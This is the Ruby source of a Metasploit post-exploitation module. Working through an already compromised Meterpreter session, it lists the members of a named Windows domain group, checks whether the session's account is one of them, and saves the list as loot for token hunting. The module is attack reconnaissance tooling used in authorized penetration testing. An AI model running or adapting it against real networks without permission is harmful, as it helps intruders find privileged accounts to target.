rapid7/metasploit-framework

View on GitHub
modules/post/windows/gather/enum_domain_group_users.rb

Summary

Maintainability
B
4 hrs
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Enumerate Domain Group',
        'Description' => %q{
          This module extracts user accounts from the specified domain group
          and stores the results in the loot. It will also verify if session
          account is in the group. Data is stored in loot in a format that
          is compatible with the token_hunter plugin. This module must be
          run on a session running as a domain user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
          'Stephen Haywood <haywoodsb[at]gmail.com>'
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_config_getuid
            ]
          }
        }
      )
    )
    register_options([
      OptString.new('GROUP', [true, 'Domain Group to enumerate', nil])
    ])
  end

  def run
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
    print_status("Running module against #{hostname} (#{session.session_host})")

    group = datastore['GROUP']

    fail_with(Failure::BadConfig, 'GROUP must be set.') if group.blank?

    domain = get_domain_name

    fail_with(Failure::Unknown, 'Could not retrieve domain name. Is the host part of a domain?') if domain.blank?

    netbios_domain_name = domain.split('.').first.upcase

    members = get_members_from_group(group, domain) || []

    fail_with(Failure::Unknown, "No members found for '#{domain}\\#{group}' group.") if members.blank?

    print_status("Found #{members.length} users in '#{domain}\\#{group}' group.")

    loot = []
    members.each do |user|
      print_status("\t#{netbios_domain_name}\\#{user}")
      loot << "#{netbios_domain_name}\\#{user}"
    end

    user_domain, user = client.sys.config.getuid.split('\\')

    if user_domain.downcase.include?(netbios_domain_name.downcase) && members.map { |u| u.downcase == user.downcase }.include?(true)
      print_good("Current session running as #{domain}\\#{user} is a member of #{domain}\\#{group}!")
    else
      print_status("Current session running as #{domain}\\#{user} is not a member of #{domain}\\#{group}")
    end

    loot_file = store_loot(
      'domain.group.members',
      'text/plain',
      session,
      loot.join("\n"),
      nil,
      group
    )

    print_good("User list stored in #{loot_file}")
  end
end